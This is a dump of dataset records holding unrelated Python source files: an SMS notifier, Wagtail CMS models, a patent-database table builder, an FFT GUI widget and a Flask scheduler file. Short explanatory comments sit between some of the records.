stack.clear()","repo_name":"buyeolim/ps_prac","sub_path":"BOJ/python3/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13952074118","text":"#/usr/bin/env python2\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nimport gobject\nimport pynotify\n\nbus_name = \"org.freedesktop.ModemManager1\"\nsms_base_object = \"/org/freedesktop/ModemManager1/SMS/\"\nmodem_object = 
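# Hedged notes on icmpv6.py above:
# 1) ICMPv6OptionLinkLayerAddress.to_bytes and
#    ICMPv6OptionRedirectedHeader.to_bytes both compute len(v), but no name
#    `v` is in scope -- presumably len(value) was intended; as written,
#    either call raises NameError.
# 2) construct_icmpv6_class_map resolves "ICMPv6<TypeName>" with eval(); a
#    namespace lookup does the same without evaluating strings. Sketch under
#    that assumption, not the module's actual API:
def icmpv6_class_from_name(name, namespace=None):
    namespace = namespace if namespace is not None else globals()
    return namespace.get(name)  # None when no such class is defined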
\"/org/freedesktop/ModemManager1/Modem/0\"\n\nDBusGMainLoop(set_as_default=True)\n\nsystem_bus = dbus.SystemBus()\n\nclass mm_sms:\n def _get_manager(self, interface):\n sms_proxy = system_bus.get_object(bus_name, self.sms_path)\n return dbus.Interface(sms_proxy, interface)\n \n def _get_properties_manager(self):\n return self._get_manager(\"org.freedesktop.DBus.Properties\")\n \n def _get_sms_manager(self):\n return self._get_manager(\"org.freedesktop.ModemManager1.Sms\")\n\n def _load_sms(self, sms_path):\n self.sms_path = sms_path\n sms_manager = self._get_properties_manager()\n self.text = sms_manager.Get(bus_name + \".Sms\", \"Text\")\n self.sender = sms_manager.Get(bus_name + \".Sms\", \"Number\")\n self.received = True\n\n def _create_sms(self, recipient, text):\n self.sms_path = self._modem.create_message(recipient, text)\n self.received = False\n self.text = text\n self.recipient = recipient\n\n def __init__(self, sms_path = None, recipient = None, text = None, \n modem = None):\n self.sms_path = None\n self.sender = None\n self.received = None\n self.recipient = None\n self._modem = modem\n if sms_path != None:\n self._load_sms(sms_path)\n elif recipient != None:\n self._create_sms(recipient, text)\n\n def pretty(self):\n if (self.received == True):\n return (\"SMS %s from <%s> says: %s\" \n % (self.sms_path, self.sender, self.text))\n elif (self.received == False):\n return (\"SMS %s to <%s> says: %s\" \n % (self.sms_path, self.recipient, self.text))\n\n def delete_from_modem(self):\n self._modem.delete_message(self.sms_path)\n\n def send(self):\n sms_manager = self._get_sms_manager()\n sms_manager.Send()\n\nclass mm_modem_messaging:\n def __init__(self, modem_id = 0):\n self._messaging_proxy = system_bus.get_object(bus_name, modem_object)\n self._messaging_manager = dbus.Interface(self._messaging_proxy,\n \"org.freedesktop.ModemManager1.Modem.Messaging\")\n \n def delete_message(self, path):\n self._messaging_manager.Delete(path)\n\n def add_added_callback(self, handler):\n self._messaging_manager.connect_to_signal(\"Added\", handler)\n\n def create_message(self, number, text):\n return self._messaging_manager.Create({\n 'number': number, \n 'text': text,\n })\n \nmodem = mm_modem_messaging()\n\ndef handler(path = None, received = None):\n print(\"Got signal from %s, received = %d\" % (path, received))\n sms = mm_sms(sms_path = path, modem = modem)\n print(sms.pretty())\n title = \"SMS Received from %s\" % sms.sender\n text = sms.text\n icon = \"/usr/share/icons/Tango/32x32/status/sunny.png\"\n pynotify.init(\"Test Application\")\n notification = pynotify.Notification(title, text, icon) \n notification.set_urgency(pynotify.URGENCY_NORMAL)\n notification.show() \n sms.delete_from_modem()\n\nmodem.add_added_callback(handler)\n#sms = mm_sms(modem = modem, recipient = '+49-and-so-on', text = 'Test')\n#sms.send()\nloop = gobject.MainLoop()\nloop.run()\n","repo_name":"naseschwarz/sms-notify","sub_path":"sms-notify.py","file_name":"sms-notify.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1350061648","text":"from datetime import date\n\nfrom django.db import models\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom wagtail.wagtailcore.models import Page, Orderable\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailadmin.edit_handlers import 
FieldPanel, MultiFieldPanel, \\\n InlinePanel, PageChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailimages.models import Image\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailsnippets.models import register_snippet\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\nfrom wagtail.wagtailsearch import index\n\nfrom modelcluster.fields import ParentalKey\nfrom modelcluster.tags import ClusterTaggableManager\nfrom taggit.models import Tag, TaggedItemBase\n \nfrom ethagaval.utils import export_event\n\n\nEVENT_AUDIENCE_CHOICES = (\n ('public', \"Public\"),\n ('private', \"Private\"),\n)\n\n\n# A couple of abstract classes that contain commonly used fields\n\nclass LinkFields(models.Model):\n link_external = models.URLField(\"External link\", blank=True)\n link_page = models.ForeignKey(\n 'wagtailcore.Page',\n null=True,\n blank=True,\n related_name='+'\n )\n link_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n related_name='+'\n )\n\n @property\n def link(self):\n if self.link_page:\n return self.link_page.url\n elif self.link_document:\n return self.link_document.url\n else:\n return self.link_external\n\n panels = [\n FieldPanel('link_external'),\n PageChooserPanel('link_page'),\n DocumentChooserPanel('link_document'),\n ]\n\n class Meta:\n abstract = True\n\n\nclass ContactFields(models.Model):\n telephone = models.CharField(max_length=20, blank=True)\n email = models.EmailField(blank=True)\n address_1 = models.CharField(max_length=255, blank=True)\n address_2 = models.CharField(max_length=255, blank=True)\n city = models.CharField(max_length=255, blank=True)\n country = models.CharField(max_length=255, blank=True)\n post_code = models.CharField(max_length=10, blank=True)\n\n panels = [\n FieldPanel('telephone'),\n FieldPanel('email'),\n FieldPanel('address_1'),\n FieldPanel('address_2'),\n FieldPanel('city'),\n FieldPanel('country'),\n FieldPanel('post_code'),\n ]\n\n class Meta:\n abstract = True\n\n\n# Carousel items\n\nclass CarouselItem(LinkFields):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n embed_url = models.URLField(\"Embed URL\", blank=True)\n caption = models.CharField(max_length=255, blank=True)\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('embed_url'),\n FieldPanel('caption'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\n# Related links\n\nclass RelatedLink(LinkFields):\n title = models.CharField(max_length=255, help_text=\"Link title\")\n\n panels = [\n FieldPanel('title'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\n# Advert Snippet\n\nclass AdvertPlacement(models.Model):\n page = ParentalKey('wagtailcore.Page', related_name='advert_placements')\n advert = models.ForeignKey('ethagaval.Advert', related_name='+')\n\n\nclass Advert(models.Model):\n page = models.ForeignKey(\n 'wagtailcore.Page',\n related_name='adverts',\n null=True,\n blank=True\n )\n url = models.URLField(null=True, blank=True)\n text = models.CharField(max_length=255)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('url'),\n FieldPanel('text'),\n ]\n\n def __unicode__(self):\n return self.text\n\nregister_snippet(Advert)\n\n\n# Home Page\n\nclass HomePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('ethagaval.HomePage', 
related_name='carousel_items')\n\n\nclass HomePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.HomePage', related_name='related_links')\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\n class Meta:\n verbose_name = \"Homepage\"\n\nHomePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel(HomePage, 'carousel_items', label=\"Carousel items\"),\n InlinePanel(HomePage, 'related_links', label=\"Related links\"),\n]\n\nHomePage.promote_panels = Page.promote_panels\n\n\n# Contact page\n\nclass ContactPage(Page, ContactFields):\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\nContactPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('body', classname=\"full\"),\n MultiFieldPanel(ContactFields.panels, \"Contact\"),\n]\n\nContactPage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\n#Resource Index\n\nclass ResourceIndexPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.ResourceIndexPage', related_name='related_links')\n\n\nclass ResourceIndexPage(Page):\n description = RichTextField(blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('description'),\n )\n\n @property\n def resources(self):\n # Get list of live event pages that are descendants of this page\n resources = ResourcePage.objects.live().descendant_of(self)\n\n # Filter resources list to get ones that are either\n # running now or start in the future\n # resources = resources.filter(date_from__gte=date.today())\n\n # Order by date\n resources = resources.order_by('date_from')\n\n return resources\n\nResourceIndexPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('description', classname=\"full\"),\n InlinePanel(ResourceIndexPage, 'related_links', label=\"Related links\"),\n]\n\nResourceIndexPage.promote_panels = Page.promote_panels\n\n\nclass ResourcePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('ethagaval.ResourcePage', related_name='carousel_items')\n\n\nclass ResourcePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('ethagaval.ResourcePage', related_name='related_links')\n\n\nclass ResourcePageOwner(Orderable, LinkFields):\n page = ParentalKey('ethagaval.ResourcePage', related_name='owners')\n first_name = models.CharField(\"Name\", max_length=255, blank=True)\n last_name = models.CharField(\"Surname\", max_length=255, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n @property\n def name_display(self):\n return self.first_name + \" \" + self.last_name\n\n panels = [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n ImageChooserPanel('image'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n\nclass ResourcePage(Page):\n name = models.CharField(max_length=255)\n date_from = models.DateField(\"Start date\")\n time_from = models.TimeField(\"Start time\", null=True, blank=True)\n time_to = models.TimeField(\"End time\", null=True, blank=True)\n location = models.CharField(max_length=255)\n description = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 
'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('location'),\n index.SearchField('description'),\n index.SearchField('name'),\n )\n\n @property\n def resource_index(self):\n # Find closest ancestor which is an event index\n return self.get_ancestors().type(ResourceIndexPage).last()\n\n def serve(self, request):\n if \"format\" in request.GET:\n if request.GET['format'] == 'ical':\n # Export to ical format\n response = HttpResponse(\n export_event(self, 'ical'),\n content_type='text/calendar',\n )\n response['Content-Disposition'] = 'attachment; filename=' + self.slug + '.ics'\n return response\n else:\n # Unrecognised format error\n message = 'Could not export event\\n\\nUnrecognised format: ' + request.GET['format']\n return HttpResponse(message, content_type='text/plain')\n else:\n # Display event page as usual\n return super(ResourcePage, self).serve(request)\n\nResourcePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('name'),\n FieldPanel('date_from'),\n FieldPanel('time_from'),\n FieldPanel('time_to'),\n FieldPanel('location'),\n InlinePanel(ResourcePage, 'carousel_items', label=\"Carousel items\"),\n FieldPanel('description', classname=\"full\"),\n InlinePanel(ResourcePage, 'owners', label=\"Owners\"),\n InlinePanel(ResourcePage, 'related_links', label=\"Related links\"),\n]\n\nResourcePage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\nclass FormField(AbstractFormField):\n page = ParentalKey('FormPage', related_name='form_fields')\n\nclass FormPage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n\nFormPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel(FormPage, 'form_fields', label=\"Form fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldPanel('to_address', classname=\"full\"),\n FieldPanel('from_address', classname=\"full\"),\n FieldPanel('subject', classname=\"full\"),\n ], \"Email\")\n]\n","repo_name":"arvindram03/e-thagaval","sub_path":"ethagaval/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9010993352","text":"import time\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nfrom lib.configuration import get_connection_string\n\n\n#########################################################################################################\n# WIDE TABLE CREATION BELOW\n#########################################################################################################\n# REQUIRES: db_con, old_db, new_db, entity, raw entity table name, total rows in raw entity table, new_db timestamp\n# MODIFIES: nothing\n# EFFECTS: returns list of wide persistent entity columns\ndef get_wide_entity_disambig_cols(db_con, old_db, persistent_disambig_table):\n result = db_con.execute(\n \"select column_name from information_schema.columns where table_schema = '{0}' and table_name = '{1}';\".format(\n old_db, persistent_disambig_table))\n result_cols = [r[0] for r in result]\n disambig_cols = [x for x in result_cols if x.startswith('disamb')]\n disambig_cols.sort()\n print(disambig_cols)\n\n return disambig_cols\n\n\n# REQUIRES: db_con, old_db, new_db, entity, raw entity table name, total rows in 
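# Hedged usage note for ResourcePage.serve above: export behaviour is driven
# entirely by the `format` query parameter. Illustrative requests (the URL
# path is an assumption, not from the record):
#   GET /resources/some-event/?format=ical -> text/calendar attachment named
#       "<slug>.ics", produced by export_event(self, 'ical')
#   GET /resources/some-event/?format=csv  -> plain-text "Could not export
#       event ... Unrecognised format: csv"
#   GET /resources/some-event/             -> the normal page response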
raw entity table, new_db timestamp\n# MODIFIES: nothing\n# EFFECTS: writes .tsv of table in wide format\ndef write_wide_outfile(db_con, new_db, old_db, entity, persistent_long_table, raw_table, id_col, total_rows, outfile_fp,\n header_df):\n # fixed\n current_rawentity = 'current_raw{0}_id'.format(entity)\n old_rawentity = 'old_raw{0}_id'.format(entity)\n disamb_str = 'disamb_{}_id_'.format(entity)\n\n # fixed\n chunk_cols = [current_rawentity, old_rawentity, 'database_update', id_col]\n\n ############ 2. Convert long -> wide and output .tsv: grab all uuid rows together for a set of uuids\n limit = 300000\n offset = 0\n\n start = time.time()\n itr = 0\n\n print('Estimated # of rounds: ', total_rows / 300000)\n\n while True:\n\n print('###########################################\\n')\n\n print('Next iteration... ', itr)\n\n sql_stmt_inner = \"(select uuid from {0}.{1} order by uuid limit {2} offset {3}) raw\".format(new_db, raw_table,\n limit, offset)\n sql_stmt_template = \"select lf.uuid as {0}, raw_old.uuid as {1}, lf.database_update, lf.{2} from {3} left join {4}.{5} lf on raw.uuid = lf.uuid left join {5}.{6} raw_old on lf.uuid = raw_old.uuid;\".format(\n current_rawentity, old_rawentity, id_col, sql_stmt_inner, new_db, persistent_long_table, old_db, raw_table)\n\n print(sql_stmt_template)\n result = db_con.execute(sql_stmt_template)\n\n chunk_results = [r for r in result]\n\n # no more result batches to process! done\n if len(chunk_results) == 0:\n break\n\n # 0. Preprocess dataupdate column to add prefix + save current/old uuid lookup\n chunk_df = pd.DataFrame(chunk_results, columns=chunk_cols)\n chunk_df['database_update'] = disamb_str + chunk_df['database_update']\n\n uuid_lookup = chunk_df[[current_rawentity, old_rawentity]].drop_duplicates()\n\n # 1. Pivot, reset index & get back uuid as column, rename axis & remove database_update axis value\n pivoted_chunk_df = chunk_df.pivot(index=current_rawentity, columns='database_update',\n values=id_col).reset_index().rename_axis(None, 1)\n\n # 2. Merge back old rawinventor id column\n merged_df = pd.merge(pivoted_chunk_df, uuid_lookup)\n\n # 3. Concat with sort = False (preserves desired col order from header_df)\n formatted_chunk_df = pd.concat([header_df, merged_df], sort=False)\n\n # 4. Write to outfile\n formatted_chunk_df.to_csv(outfile_fp, index=False, header=False, mode='a', sep='\\t', na_rep=None)\n\n offset += limit\n itr += 1\n\n if itr == 1:\n print('Time for 1 iteration: ', time.time() - start, ' seconds')\n print('###########################################\\n')\n\n print('###########################################\\n')\n print('total time taken:', round(time.time() - start, 2), ' seconds')\n print('###########################################\\n')\n\n return\n\n\n# REQUIRES: db_con, entity, persistent entity table, outfile folder path\n# MODIFIES: nothing\n# EFFECTS: creates persistent entity table for new database\ndef create_wide_table_database(db_con, entity, persistent_disambig_table, outfile_fp):\n ####### 3. 
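# Hedged illustration of the long-to-wide step in write_wide_outfile above:
# DataFrame.pivot turns one row per (uuid, database_update) into one column
# per update. Toy data only; the column names mimic the inventor case.
import pandas as pd

long_df = pd.DataFrame({
    'current_rawinventor_id': ['u1', 'u1', 'u2'],
    'database_update': ['disamb_inventor_id_20200929',
                        'disamb_inventor_id_20201229',
                        'disamb_inventor_id_20200929'],
    'inventor_id': ['a', 'a', 'b'],
})
wide_df = (long_df
           .pivot(index='current_rawinventor_id',
                  columns='database_update',
                  values='inventor_id')
           .reset_index()
           .rename_axis(None, axis=1))
# wide_df now has one row per uuid and one disamb_inventor_id_* column per
# update, with NaN where a uuid was absent from an update (u2 above).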
create table in database\n db_con.execute('drop table if exists {}.{}'.format(new_db, persistent_disambig_table))\n\n current_rawentity = 'current_raw{0}_id'.format(entity)\n\n # only read header for creating table\n wide_df = pd.read_csv(outfile_fp, sep='\\t', nrows=1)\n entity_db_cols = list(wide_df.columns.values)\n\n create_stmt = 'create table {0}.{1} ( '.format(new_db, persistent_disambig_table)\n primary_key_stmt = 'PRIMARY KEY (`{0}`));'.format(current_rawentity)\n\n create_stmt = get_create_syntax(db_con, entity, entity_db_cols, create_stmt)\n\n create_stmt = create_stmt + primary_key_stmt\n print(create_stmt)\n db_con.execute(create_stmt)\n\n return\n\n\ndef create_persistent_wide_entity(config, entity):\n db_con = create_engine(get_connection_string(config, 'NEW_DB')+'&local_infile=1')\n disambig_folder = \"{}/disambig_output/\".format(config['FOLDERS']['WORKING_FOLDER'])\n\n old_db = config['DATABASE']['OLD_DB']\n new_db = config['DATABASE']['NEW_DB']\n new_db_timestamp = new_db.replace('patent_', '')\n\n # set of values that change depending on entity\n persistent_long_table = 'persistent_{0}_disambig_long'.format(entity)\n raw_table = 'raw{0}'.format(entity)\n id_col = '{0}_id'.format(entity)\n\n outfile_name_wide = 'persistent_{}_wide.tsv'.format(entity)\n outfile_fp_wide = disambig_folder + outfile_name_wide\n\n persistent_disambig_table = 'persistent_{0}_disambig'.format(entity)\n\n # get disambig cols from old db's persistent_inventor_disambig\n disambig_cols = get_wide_entity_disambig_cols(db_con, old_db, persistent_disambig_table)\n\n # Add new column for this data update:\n raw_cols = ['current_{0}_id'.format(raw_table), 'old_{0}_id'.format(raw_table)]\n header_wide = [raw_cols[0], raw_cols[1]] + disambig_cols + ['disamb_{0}_id_'.format(entity) + new_db_timestamp]\n print(header_wide)\n header_df = pd.DataFrame(columns=header_wide)\n header_df.to_csv(outfile_fp_wide, index=False, header=True, sep='\\t')\n # get total rows in raw entity table\n result = db_con.execute('select count(*) from {0}.{1}'.format(new_db, raw_table))\n total_rows = [r[0] for r in result][0]\n write_wide_outfile(db_con, new_db, old_db, entity, persistent_long_table, raw_table, id_col, total_rows,\n outfile_fp_wide, header_df)\n\n ####### 3. create table in database\n create_wide_table_database(db_con, entity, persistent_disambig_table, outfile_fp_wide)\n\n ######### 4. 
load data\n db_con.execute(\n \"LOAD DATA LOCAL INFILE '{0}' INTO TABLE {1}.{2} FIELDS TERMINATED BY '\\t' NULL DEFINED BY '' IGNORE 1 lines;\".format(\n outfile_fp_wide, new_db, persistent_disambig_table))\n\n return True\n","repo_name":"PatentsView/PatentsView-DB","sub_path":"updater/post_processing/create_wide_persistent.py","file_name":"create_wide_persistent.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"67"} +{"seq_id":"1252113229","text":"import gpi\nimport numpy as np\nfrom gpi import QtWidgets\n\n\n# WIDGET\nclass FFTW_GROUP(gpi.GenericWidgetGroup):\n \"\"\"A combination of SpinBoxes, DoubleSpinBoxes, and PushButtons\n to form a unique widget suitable for FFT options on dimensions.\n \"\"\"\n valueChanged = gpi.Signal()\n\n def __init__(self, title, parent=None):\n super().__init__(title, parent)\n\n self._val = {}\n self._val['compute'] = False\n self._val['length'] = 1\n self._val['in_len'] = 1 # the original array length\n\n self.pb = gpi.BasicPushButton()\n self.pb.set_toggle(True)\n\n self.db = gpi.BasicDoubleSpinBox() # factor\n self.db.set_label('factor:')\n self.db.set_min(0.001)\n self.db.set_max(gpi.GPI_FLOAT_MAX)\n self.db.set_decimals(3)\n self.db.set_singlestep(0.001)\n self.db.set_val(1)\n\n self.sb = gpi.BasicSpinBox() # length\n self.sb.set_label('length:')\n self.sb.set_min(1)\n self.sb.set_val(1)\n self.sb.set_max(gpi.GPI_INT_MAX)\n\n self.db.valueChanged.connect(self.factChange)\n self.sb.valueChanged.connect(self.lenChange)\n self.pb.valueChanged.connect(self.compChange)\n\n vbox = QtWidgets.QHBoxLayout()\n vbox.addWidget(self.pb)\n vbox.addWidget(self.db)\n vbox.addWidget(self.sb)\n vbox.setStretch(0, 0)\n vbox.setStretch(1, 0)\n vbox.setStretch(2, 0)\n vbox.setContentsMargins(0, 0, 0, 0) # we don't need margins here\n vbox.setSpacing(0)\n self.setLayout(vbox)\n\n # setters\n def set_val(self, val):\n \"\"\"A python-dict containing: in_len, length, and compute parms. \"\"\"\n sig = False\n if 'in_len' in val:\n # otherwise this would change every time compute() was called\n if self._val['in_len'] != val['in_len']:\n self._val['in_len'] = val['in_len']\n fact = self.db.get_val() # set len based on factor\n fact *= self._val['in_len']\n self.setLenQuietly(int(fact))\n self._val['length'] = int(fact)\n if 'length' in val:\n self._val['length'] = val['length']\n self.setLenQuietly(val['length'])\n self.setFactQuietly(float(val[\n 'length'])/float(self._val['in_len']))\n sig = True\n if 'compute' in val:\n self._val['compute'] = val['compute']\n self.setCompQuietly(val['compute'])\n sig = True\n if sig:\n self.valueChanged.emit()\n\n def set_reset(self):\n \"\"\"An override that communicates with the embedded pushbutton. 
\"\"\"\n self.pb.set_reset()\n\n # getters\n def get_val(self):\n return self._val\n\n # support\n def factChange(self, val):\n self._val['length'] = int(self._val['in_len']*val)\n self.setLenQuietly(self._val['length'])\n self.valueChanged.emit()\n\n def lenChange(self, val):\n self._val['length'] = val\n self.setFactQuietly(float(val)/float(self._val['in_len']))\n self.valueChanged.emit()\n\n def compChange(self, val):\n self._val['compute'] = val\n self.valueChanged.emit()\n if val:\n self.pb.set_button_title('ON')\n else:\n self.pb.set_button_title('')\n\n def setFactQuietly(self, val):\n self.db.blockSignals(True)\n self.db.set_val(val)\n self.db.blockSignals(False)\n\n def setLenQuietly(self, val):\n self.sb.blockSignals(True)\n self.sb.set_val(val)\n self.sb.blockSignals(False)\n\n def setCompQuietly(self, val):\n self.pb.blockSignals(True)\n self.pb.set_val(val)\n self.pb.blockSignals(False)\n\n\nclass ExternalNode(gpi.NodeAPI):\n \"\"\"A module that implements the FFTW C++ package.\n Cropping and zero-padding only work on transformed dimensions.\n\n INPUT - data to be transformed, can be real or complex. DC is assumed to be at index N/2 (starting at 0)\n\n OUTPUT - transformed data, complex. DC is at index N/2 (starting at 0)\n\n WIDGETS:\n Dimension i - button turns off/on tranform in ith dimension\n factor and length are redundant parameters, length is the output dimension size\n factor = length/(input dimension size)\n factors < 1 result in cropping data before transformation\n factors > 1 result in zero-padding before transformation\n compute - compute\n direction - select whether you want a Forward or Inverse FFT\n \"\"\"\n\n def execType(self):\n # default executable type\n # return GPI_THREAD\n return gpi.GPI_PROCESS\n # return GPI_APPLOOP\n\n def initUI(self):\n\n # Widgets\n self.dim_base_name = 'Dimension['\n self.ndim = 10 # underlying c-code is only 10-dim\n for i in range(self.ndim):\n self.addWidget('FFTW_GROUP', self.dim_base_name+str(-i-1)+']')\n\n self.addWidget('PushButton', 'inverse', toggle=True)\n self.addWidget('PushButton', 'compute', toggle=True)\n\n # IO Ports\n self.addInPort('in', 'NPYarray', obligation=gpi.REQUIRED)\n self.addOutPort('out', 'NPYarray', dtype=np.complex64)\n\n def validate(self):\n '''update the widget bounds based on the input data\n '''\n\n # only update bounds if the 'in' port changed.\n if 'in' in self.portEvents():\n\n data = self.getData('in')\n\n # visibility and bounds\n for i in range(self.ndim):\n if i < len(data.shape):\n val = {'in_len': data.shape[-i-1]}\n self.setAttr(self.dim_base_name+str(-i-1)+']',\n visible=True, val=val)\n else:\n self.setAttr(self.dim_base_name+str(-i-1)+']',\n visible=False)\n\n # only change bounds if the 'direction' widget changed.\n if 'direction' in self.widgetEvents():\n direction = self.getVal('direction')\n if direction:\n self.setAttr('direction', button_title=\"INVERSE\")\n else:\n self.setAttr('direction', button_title=\"FORWARD\")\n\n return(0)\n\n def compute(self):\n\n data = self.getData('in')\n data = np.require(data, dtype=np.complex64, requirements='C')\n\n if self.getVal('compute'):\n\n # build the fft.fft argument list\n kwargs = {}\n\n # Direction | 0:FWD, 1:BKWD\n if self.getVal('inverse'):\n kwargs['dir'] = 1\n else:\n kwargs['dir'] = 0\n\n out_dims = np.array([], np.int64)\n\n # load up the dimension args\n for i in range(self.ndim):\n kwargs['dim'+str(i+1)] = 0\n val = self.getVal(self.dim_base_name+str(-i-1)+']')\n if i < len(data.shape):\n out_dims = np.append(out_dims, 
val['length'])\n if val['compute']:\n kwargs['dim'+str(i+1)] = 1\n\n\n # import in thread to save namespace\n import gpi_core.math.fft as ft\n\n out = ft.fftw(data, out_dims, **kwargs)\n\n self.setData('out', out)\n\n return(0)\n","repo_name":"gpilab/core-nodes","sub_path":"gpi_core/math/GPI/FFTW_GPI.py","file_name":"FFTW_GPI.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"21525755599","text":"from flask_apscheduler import APScheduler\nfrom apscheduler.events import (\n EVENT_JOB_EXECUTED,\n EVENT_JOB_ERROR,\n)\nfrom application.core.utils.logging_ import logging\nfrom .controls import (\n pull_ctr_check_process,\n push_trigger_schedule,\n push_cron_schedule,\n push_retention,\n push_close_ssh,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef default_job(x, y) -> None:\n logger.info(f\"Default job start with args, {x}, and {y}\")\n\n\ndef schedule_check_process() -> None:\n \"\"\"Check process in `ctr_task_process` table and alert\n if exists 2 status longtime\n \"\"\"\n ps_false, ps_wait, ps_thread = pull_ctr_check_process()\n logger.info(\n f\"Check process false: {ps_false} \"\n f\"waiting: {ps_wait} thread: {ps_thread}\"\n )\n\n\ndef schedule_retention_data() -> None:\n \"\"\"\n Run retention module with schedule\n \"\"\"\n ps_time: int = push_retention()\n logger.info(f\"Success run retention data by schedule with {ps_time} sec.\")\n\n\ndef schedule_trigger() -> None:\n \"\"\"Run data pipeline trigger from data in `ctr_task_schedule`\n \"\"\"\n ps_time: int = push_trigger_schedule()\n logger.info(\n f\"End Schedule trigger for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_every_sunday() -> None:\n \"\"\"Run data pipeline cron job every sunday at 00.05 AM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='every_sunday_at_00_05')\n logger.info(\n f\"End Schedule `every_sunday_at_00_05` for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_everyday() -> None:\n \"\"\"\n Run data pipeline cron job everyday at 08.05 PM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='everyday_at_08_05')\n logger.info(\n f\"End Schedule `everyday_at_08_05` for run data pipeline \"\n f\"with {ps_time} sec.\"\n )\n\n\ndef schedule_cron_every_quarter() -> None:\n \"\"\"\n Run data pipeline cron job every quarter at 19th and 00.10 AM\n \"\"\"\n ps_time: int = push_cron_schedule(group_name='every_quarter_at_19th_00_10')\n logger.info(\n f\"End Schedule `every_quarter_at_19th_00_10` \"\n f\"for run data pipeline with {ps_time} sec.\"\n )\n\n\ndef schedule_close_ssh() -> None:\n \"\"\"Close SSH session\"\"\"\n import time\n time.sleep(10)\n push_close_ssh()\n\n\ndef listener_log(event):\n \"\"\"Listener\"\"\"\n if event.exception:\n logger.warning('The job crashed :(')\n else:\n logger.info('The job worked :)')\n\n\ndef add_schedules(scheduler: APScheduler):\n \"\"\"Add job schedules without decorator functions\"\"\"\n\n # scheduler.add_job(\n # 'retention_data',\n # schedule_retention_data,\n # trigger='cron',\n # day='1st sun',\n # jitter=600\n # )\n\n scheduler.add_job(\n id='check_process',\n func=schedule_check_process,\n trigger='cron',\n minute='*/10',\n jitter=10,\n misfire_grace_time=None,\n\n # Usage configuration\n max_instances=1,\n\n # Option for using job store\n jobstore='sqlite',\n replace_existing=True,\n )\n\n scheduler.add_job(\n id='trigger_schedule',\n func=schedule_trigger,\n trigger='interval',\n minutes=1,\n 
